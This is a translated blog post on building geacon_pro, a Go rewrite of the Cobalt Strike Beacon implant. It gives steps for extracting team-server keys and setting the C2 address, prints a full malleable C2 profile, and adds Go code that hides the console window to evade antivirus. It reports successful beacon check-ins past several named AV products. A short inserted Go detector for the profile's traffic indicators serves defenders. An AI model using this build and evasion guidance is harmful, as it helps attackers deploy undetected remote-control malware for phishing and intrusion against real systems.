
Open-source Beacon rewritten in Go

Author: 区块软件开发

Please comply with laws and regulations. This article is intended to improve the response strategies of security software; illegal use is strictly prohibited.

0x01 Project overview

Beacon rewritten in Go. The advantage of the Go rewrite is that it can build CS payloads for Windows, Linux and macOS, which makes cross-platform phishing or bringing hosts online in CS convenient; the drawback is that the compiled binary is around 5 MB.

Project: https://github.com/H4de5-7/geacon_pro

0x02 Build process

Three things need to be changed: the CS team server's public/private key pair, the CS listener address and port, and the profile file.

The CS team server's key pair is stored in the file .cobaltstrike.beacon_keys. A tool is needed to extract it; you can refer to the geacon project or use the prebuilt tool BeaconTool.jar that I compiled.

Replace the public and private key in config.go with the extracted ones, and replace the C2 address in config.go at the same time.

The profile shipped by the author throws errors and needs a few changes; the modified version is as follows:

```
# default sleep time is 60s; this profile uses 3 s (the value is in milliseconds)
set sleeptime "3000";

https-certificate {
    set C "KZ";
    set CN "foren.zik";
    set O "NN Fern Sub";
    set OU "NN Fern";
    set ST "KZ";
    set validity "365";
}

# define indicators for an HTTP GET
http-get {

    set uri "/www/handle/doc";

    client {
        #header "Host" "aliyun.com";
        # base64 encode session metadata and store it in the Cookie header.
        metadata {
            base64url;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        # server should send output with no changes
        #header "Content-Type" "application/octet-stream";
        header "Server" "nginx/1.10.3 (Ubuntu)";
        header "Content-Type" "application/octet-stream";
        header "Connection" "keep-alive";
        header "Vary" "Accept";
        header "Pragma" "public";
        header "Expires" "0";
        header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}

# define indicators for an HTTP POST
http-post {
    # Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
    set uri "/IMXo";
    client {
        #header "Content-Type" "application/octet-stream";

        # transmit our session identifier in the "User" header as user=[identifier]%%
        id {
            mask;
            netbiosu;
            prepend "user=";
            append "%%";
            header "User";
        }

        # post our output with no real changes
        output {
            mask;
            base64url;
            prepend "data=";
            append "%%";
            print;
        }
    }

    # The server's response to our HTTP POST
    server {
        header "Server" "nginx/1.10.3 (Ubuntu)";
        header "Content-Type" "application/octet-stream";
        header "Connection" "keep-alive";
        header "Vary" "Accept";
        header "Pragma" "public";
        header "Expires" "0";
        header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";

        # this will just print an empty string, meh...
        output {
            mask;
            netbios;
            prepend "data=";
            append "%%";
            print;
        }
    }
}
```
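As an added defender-side example (not code from this post or from the geacon_pro project), the following Go program checks HTTP traffic against the indicators the profile above defines: the GET URI with the base64url metadata cookie, the POST URI with the mask+netbiosu id header, and the server reply with its Server header and mask+netbios body. It assumes the documented transform output alphabets (netbios gives a-p, netbiosu gives A-P) and uses constructed sample messages rather than a real capture.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"regexp"
	"strings"
)
// Indicators lifted from the profile above. They are attacker-configurable,
// so a hit is a triage lead, not proof of a beacon.
var (
	getURI, postURI, serverHdr = "/www/handle/doc", "/IMXo", "nginx/1.10.3 (Ubuntu)"
	cookieRe   = regexp.MustCompile(`^SESSIONID=[A-Za-z0-9_-]+=*$`) // base64url metadata
	idHeaderRe = regexp.MustCompile(`^user=[A-P]+%%$`)               // mask + netbiosu id
	bodyRe     = regexp.MustCompile(`^data=[a-p]+%%$`)               // mask + netbios output
)

// ClassifyRequest returns "http-get", "http-post" or "" for one raw HTTP request.
func ClassifyRequest(raw string) (string, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return "", err
	}
	if req.Method == http.MethodGet && req.URL.Path == getURI &&
		cookieRe.MatchString(req.Header.Get("Cookie")) {
		return "http-get", nil
	}
	if req.Method == http.MethodPost && req.URL.Path == postURI &&
		idHeaderRe.MatchString(req.Header.Get("User")) {
		return "http-post", nil
	}
	return "", nil
}
// ClassifyResponse flags a reply whose Server header and encoded body both match
// the profile's server block; an empty tasking reply is deliberately not flagged.
func ClassifyResponse(raw string) (bool, error) {
	resp, err := http.ReadResponse(bufio.NewReader(strings.NewReader(raw)), nil)
	if err != nil {
		return false, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return err == nil && resp.Header.Get("Server") == serverHdr && bodyRe.Match(body), err
}
func main() { // constructed sample request, not a real capture
	fmt.Println(ClassifyRequest("GET /www/handle/doc HTTP/1.1\r\nHost: h\r\nCookie: SESSIONID=QUJDREVGR0g=\r\n\r\n"))
}
```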

Missing libraries must be installed before building. The Go module proxy is blocked and cannot be reached directly from mainland China, so configure a Chinese mirror or use another method.

0x03 Code changes

Any open-source AV-evasion project stops evading after a while; if we want it to stay undetected longer, we have to modify the code ourselves. The author mentions in the README that when building for Windows you add -ldflags "-H windowsgui -s -w" to shrink the binary and suppress the console window. That console-hiding linker option is commonly picked up by AV, so here we hide the console window in code instead.

```go
// HideWindow hides the console window, but only when it belongs to this
// process (a console inherited from a parent shell is left alone).
func HideWindow() {
    console := w32.GetConsoleWindow()
    if console == 0 {
        return // no console attached
    }
    _, consoleProcID := w32.GetWindowThreadProcessId(console)
    if w32.GetCurrentProcessId() == consoleProcID {
        w32.ShowWindowAsync(console, w32.SW_HIDE)
    }
}
```

Add the code above and call HideWindow() from main; the -H windowsgui option is then no longer needed at build time. After reading through the code you can modify other parts as you see fit.

0x04 Results

360 Safeguard (核晶 engine), 360 Antivirus, Huorong, Tencent PC Manager


Defender


Kaspersky Free


In all cases the beacon checks in successfully.
